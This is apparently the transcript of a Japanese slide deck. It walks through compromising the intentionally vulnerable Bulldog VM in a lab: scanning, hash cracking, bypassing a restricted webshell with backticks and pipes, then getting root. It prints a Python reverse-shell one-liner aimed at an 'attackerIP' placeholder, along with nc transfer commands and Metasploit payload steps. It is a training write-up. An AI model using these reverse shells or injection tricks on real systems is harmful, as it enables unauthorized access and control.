Upgrade to Pro — share decks privately, control downloads, hide ads and more …

boot2root_kalilinux_bulldog

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for MarkUP MarkUP
November 02, 2018
26
0

 boot2root_kalilinux_bulldog

Avatar for MarkUP

MarkUP

November 02, 2018

More Decks by MarkUP

See All by MarkUP
OwaspZap
Avatar for MarkUP markup
0
98
burpsuite_badstore
Avatar for MarkUP markup
0
140
boot2root_kalilinux_droopy
Avatar for MarkUP markup
0
35
侵入検知のファーストステップ
Avatar for MarkUP markup
0
700

Featured

See All Featured
How to train your dragon (web standard)
Avatar for Monica Dinculescu notwaldorf
97
6.6k
Data-driven link building: lessons from a $708K investment (BrightonSEO talk)
Avatar for Szymon Słowik szymonslowik
1
1k
Practical Tips for Bootstrapping Information Extraction Pipelines
Avatar for Matthew Honnibal honnibal
25
1.8k
Build your cross-platform service in a week with App Engine
Avatar for Jose L jlugia
234
18k
Raft: Consensus for Rubyists
Avatar for Patrick Van Stee vanstee
141
7.4k
svc-hook: hooking system calls on ARM64 by binary rewriting
Avatar for Akira Moroo retrage
2
200
Leveraging LLMs for student feedback in introductory data science courses - posit::conf(2025)
Avatar for Mine Cetinkaya-Rundel minecr
1
220
Hiding What from Whom? A Critical Review of the History of Programming languages for Music
Avatar for Tomoya Matsuura tomoyanonymous
2
690
Jamie Indigo - Trashchat’s Guide to Black Boxes: Technical SEO Tactics for LLMs
Avatar for Tech SEO Connect techseoconnect
PRO
0
100
Fight the Zombie Pattern Library - RWD Summit 2016
Avatar for Marcelo Somers marcelosomers
234
17k
Save Time (by Creating Custom Rails Generators)
Avatar for Garrett Dimon garrettdimon
PRO
32
2.7k
SERP Conf. Vienna - Web Accessibility: Optimizing for Inclusivity and SEO
Avatar for Sara Fernández Carmona sarafernandez
2
1.4k

Transcript

  1. サーバ侵入手法 Bulldog

  2. BulldogVM • インストール https://www.vulnhub.com/entry/bulldog-1,211/

  3. Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads

  4. Virtualbox インポート

  5. Virtualbox ネットワーク設定

  6. Virtualbox ネットワーク設定

  7. Virtualbox スナップショット

  8. ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP: pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る

  9. ポートスキャン ①> nmap -A 192.168.99.101 -A:OSの種類やその他詳細なバージョン情報などを取得可能

  10. ポートスキャン

  11. サーバスキャン ①> nikto –h 192.168.99.101 -h:対象のIPアドレスを指定するオプション

  12. サーバスキャン /dev/

  13. ディレクトリスキャン ①> dirb http://192.168.99.101/ /usr/share/wordlists/dirb/ common.txt ディクショナリファイル(/usr/share/wordlists/dirb/common.t xt)を使用してディレクトリのWebサーバー(http://192.168.99. 101/)をスキャンします。 参考:https://tools.kali.org/web-applications/dirb

  14. ディレクトリスキャン /admin/

  15. http(ポート80)へのアクセス ECサイトっぽいが閉鎖中

  16. http(ポート80)へのアクセス ハッキングを受けた的な 事を書いているけど、こ こから特に情報は得れな い。

  17. /dev/ sshが可能であることと、WebShell があることが記載されている。 WebShellでは認証が要求される

  18. /admin/ 管理者画面へアクセス可能 usrnameとpasswordが必要

  19. /dev/ ソース メールアドレスとハッシュ値を取得

  20. ハッシュ値のクラッキング ・オンラインのハッシュクラッキングツールを使用する http://crackhash.com/ https://crackstation.net/ nickとsarahのパスワードが わかった

  21. 管理者ページへの認証 管理者ページの認証をnick かsarahのどちらかでログイ ンすると、webshellの利用 条件が整う。

  22. WebShell • webshellへアクセスすると、使用できるコマンドが制限されて いる。

  23. echoコマンド echoコマンドはバック クォートで囲った中身をコ マンドとして実行し、その 結果を出力する。 または、$(…)で囲うことで も実行可能。

  24. 「|」パイプ シンプルに「|(パイプ)」で も制限外のコマンドを使用 できることがわかる。

  25. ReverseShell • リバースシェルの仕組み ①攻撃コードを送信 ②攻撃に成功し、被攻撃側が攻撃側に接続を行うよう命令が実行され る ③攻撃側が待ち受けているポートに被攻撃側が接続し、制御が奪われ る 参考: http://www.atmarkit.co.jp/ait/articles/1507/01/news023.html

  26. ReverseShell • python2系がインストールされているサーバなのでpythonのリ バースシェルを使用する。 shell.py 参考: http://pentestmonkey.net/cheat- sheet/shells/reverse-shell-cheat-sheet import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect

    (("attackerIP",attackerPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p =subprocess.call(["/bin/sh","-i"]);

  27. ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker

  28. ReverseShell ・リバースシェルの実行 attacker target

  29. (参考)ncコマンド ・port scaning(ポートが空いているか確認) % nc -vz [remotehost] 23 ・port knoking

    (ポートを使用してるサービスを確認) % nc [remotehost] 80 ・ファイル転送 (転送先) % nc -lvp 20000 ※標準出力される (転送先) % nc -lvp 20000 > file ※ファイル出力される (転送元) % nc [remotehost] 20000 < file オプション -z ポートスキャニングモード オプション -l リッスンモード オプション -v 情報表示モード オプション -p ポート番号指定

  30. msfvenomを使用したReverseShell metasploitの機能であり、ペイロードジェネレータです。 リバースシェルのペイロードを作成できます。 https://www.offensive-security.com/metasploit-unleashed/ms fvenom/

  31. ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker

  32. Metasploit framework

  33. Metasploit framework ・リバースシェルの実行 attacker target

  34. Metasploit framework

  35. root権限へ昇格

  36. パスワード推測 SUPERultH imatePASH SWORDyouH CANTget SUPERultHimatePASHSWORDyouHCANTget SUPERultimatePASSWORDyouCANTget

  37. 権限昇格